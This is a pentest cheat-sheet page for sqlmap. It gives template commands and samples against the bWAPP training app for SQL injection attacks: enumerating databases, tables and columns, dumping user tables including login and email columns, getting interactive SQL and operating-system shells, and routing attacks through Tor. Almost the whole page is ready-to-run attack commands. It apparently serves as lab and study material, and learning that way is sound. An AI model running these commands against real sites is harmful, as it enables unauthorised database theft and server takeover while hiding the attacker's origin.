LOGO
OFFENSIVE | DEFENSIVE | WIKI | ABOUT

[SQLMAP]



PRE-REQS: 1. vulnerable field 2. auth required ? 0x1: GET BANNER

sqlmap -u "INSERT_VULN_URL" --cookie=" " -b

SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -b
0x2: GET DATABASE USERS [CURRENT]

sqlmap -u "INSERT_VULN_URL" --cookie=" " --users

SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --users
0x3: GET DATABASES

sqlmap -u "INSERT_VULN_URL" --cookie=" " --dbs

SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --dbs
0x4: GET TABLES

sqlmap -u "INSERT_VULN_URL" --cookie=" " -D DATABASE_NAME --tables

SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -D bWAPP --tables
0x5: GET COLUMNS FROM TABLE

sqlmap -u "INSERT_VULN_URL" --cookie=" " -D DATABASE_NAME -T TABLE_NAME --columns

SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -D bWAPP -T users --columns
0x6: DUMP A TABLE

sqlmap -u "INSERT_VULN_URL" --cookie=" " -D DATABASE_NAME -T TABLE_NAME --dump

SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -D bWAPP -T users --dump
0x7: DUMP SPECIFIC COLUMNS

sqlmap -u "INSERT_VULN_URL" --cookie=" " -D DATABASE_NAME -T TABLE_NAME -C column_name1,column_name2 --dump

SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -D bWAPP -T users -C login,email --dump
0x8: GET INTERACTIVE DB SHELL

sqlmap -u "INSERT_VULN_URL" --cookie=" " --sql-shell

SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --sql-shell
0x9: GET SYSTEM OS SHELL

sqlmap -u "INSERT_VULN_URL" --cookie=" " --os-shell

SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --os-shell
0x10: USE PROXY TOR

sqlmap --tor --tor-type=SOCKS5 --check-tor -u "INSERT_VULN_URL" --cookie=" " -b

SAMPLE: sqlmap --tor --tor-type=SOCKS5 --check-tor -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -b
0x11: EXPLOIT SPECIFIC TECHNIQUE

sqlmap -u "INSERT_VULN_URL" --cookie=" " --technique=?

SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --technique=U
0x12: USE REQUEST AS FILE

sqlmap -r [request_filename]

SAMPLE: sqlmap -r request.txt
NOTE: It can be used to validate entire request for any vulnerability. --is-dba = to check if the current user is dba, reuslt will be true or false -p = specify the vuln parameter if it is not clear NOTES: 1. Vulnerable field can be specified with -D flag. 2. Most of time file results are stored in "/home/USER/.local/share/sqlmap/output/..." 3. Use burpsuite to intercept the traffic to know more about the authentication/session used 4. Copy request from burpsuite to use it using sqlmap. 5. Request file of a login form can be used to see if the parameters are vulnerable.

©® - Since 2023